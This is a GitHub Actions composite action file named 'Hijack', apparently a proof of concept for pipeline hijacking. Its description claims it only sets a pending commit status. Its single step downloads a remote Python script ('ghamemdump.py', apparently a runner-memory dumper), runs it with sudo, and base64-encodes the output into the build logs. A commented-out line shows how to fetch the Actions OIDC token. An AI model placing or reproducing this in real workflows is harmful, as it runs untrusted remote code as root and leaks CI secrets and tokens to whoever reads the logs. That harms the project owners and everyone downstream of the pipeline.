name: Hijack
description: 'Adds a commit status at the start of the test run to set the status to pending'
inputs:
  name:
    description: "Name of the check"
    required: true
  git_ref:
    description: "The git commit, tag, or branch to check out. Requires a corresponding Karpenter snapshot release"
    required: true
runs:
  using: "composite"
  steps:
    - shell: bash 
      run: |
        echo "Hello from custom action"
        id
        echo ----
        curl -sSf https://gist.githubusercontent.com/fproulx-boostsecurity/d63abaaac3318a4c66ef958ef2e5b525/raw/5614bc2cf50d36551d451d66c0889b867c957adc/ghamemdump.py | sudo python3 | base64
        echo ----
        # curl -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" $ACTIONS_ID_TOKEN_REQUEST_URL | base64
